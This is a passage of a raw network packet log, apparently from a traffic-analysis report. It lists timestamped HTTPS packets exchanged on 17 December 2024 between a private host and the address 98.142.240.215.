                                                                                                                                                                              Dec 17, 2024 18:12:26.576873064 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.576961040 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.576971054 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.577008963 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.718835115 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.718986988 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.719024897 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.719084024 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.721692085 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.721779108 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.721784115 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.721848965 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.725325108 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.725405931 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.725411892 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.725454092 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.728483915 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.728579998 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.728589058 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.728671074 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.731992960 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.732068062 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.732075930 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.732119083 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.735492945 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.735573053 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.735579967 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.735637903 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.738504887 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.738583088 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.738590002 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.738630056 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.741724968 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.741797924 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.741805077 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.741851091 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.745596886 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.745673895 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.745681047 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.745722055 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.748764992 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.748853922 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.748862028 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.748907089 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.751843929 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.751929998 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.751936913 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.752022028 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.755434990 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.755520105 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.755527020 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.755568981 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.759244919 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.759322882 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.759329081 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.759375095 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.762236118 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.762307882 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.762314081 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.762373924 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.765530109 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.765609980 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.765619993 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.765660048 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.769345999 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.769422054 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.769428015 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.769469976 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.911053896 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.911170006 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.911201000 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.911276102 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.914273024 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.914356947 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.914364100 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.914405107 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.917380095 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.917467117 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.917474985 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.917521000 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.920535088 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.920612097 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.920619011 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.920660973 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.924392939 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.924464941 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.924473047 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.924534082 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.927396059 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.927469015 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.927474976 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.927515984 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.930699110 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.930774927 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.930780888 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.930821896 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.934529066 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.934627056 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.934633970 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.934681892 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.937846899 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.937932968 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.937938929 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.937982082 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.940759897 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.940843105 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.940850019 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.940918922 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.944678068 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.944751024 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.944756985 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.944797993 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.948120117 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.948200941 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.948214054 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.948256969 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.951206923 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.951282978 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.951288939 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.951406002 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.954417944 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.954494953 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.954502106 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.954543114 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.958205938 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.958283901 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.958291054 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.958333969 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.961473942 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.961554050 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.961560011 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.961620092 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.102998972 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.106177092 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.106276989 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.106304884 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.106357098 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.106357098 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.109559059 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.109651089 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.109666109 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.109707117 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.112376928 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.112466097 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.112477064 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.112513065 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.116240025 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.116317034 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.116328001 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.116369963 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.119462013 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.119656086 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.119667053 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.119791985 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.122528076 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.122606993 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.122617006 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.122654915 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.128082037 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.128186941 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.128199100 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.128305912 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.130379915 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.130458117 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.130469084 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.130527020 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.133450985 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.133527040 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.133537054 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.133578062 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.136421919 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.136490107 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.136499882 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.136537075 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.141072989 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.141145945 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.141155958 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.141220093 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.145581961 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.145652056 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.145662069 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.145700932 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.146475077 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.146539927 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.146549940 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.146590948 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.157624006 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.157721996 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.157731056 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.157792091 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.160121918 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.160196066 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.160206079 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.160248041 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.295434952 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.295557022 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.295577049 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.295641899 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.298333883 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.298408031 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.298420906 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.298459053 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.302099943 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.302165985 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.302175999 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.302217007 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.305361032 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.305430889 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.305440903 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.305476904 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.309288979 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.309357882 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.309367895 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.309406042 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.313570976 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.313669920 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.313682079 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.313723087 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.315813065 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.315888882 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.315897942 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.315952063 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.319262028 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.319355011 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.319365025 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.319406033 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.322264910 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.322330952 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.322340965 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.322376966 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.325592041 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.325654984 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.325665951 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.325702906 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.329339027 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.329401970 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.329412937 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.329447031 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.332187891 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.332252979 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.332262993 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.332298040 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.335900068 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.335967064 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.335977077 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.336014032 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.339159012 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.339230061 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.339238882 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.339296103 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.343000889 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.343058109 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.343067884 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.343103886 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.346117020 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.346200943 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.346210003 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.346245050 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.493886948 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.494029999 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.494048119 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.494129896 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.496599913 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.496695995 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.496706963 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.496747017 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.499974012 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.500050068 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.500060081 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.500102043 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.503765106 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.503844976 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.503854036 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.503894091 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.506932974 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.506999969 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.507009983 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.507057905 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.509946108 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.510030985 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.510040045 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.510086060 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.513765097 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.513835907 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.513847113 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.513885975 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.517163992 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.517362118 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.517371893 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.517414093 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.520034075 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.520118952 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.520128012 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.520164967 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.524405956 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:27.524473906 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:27.524483919 CET4434973198.142.240.215192.168.2.4
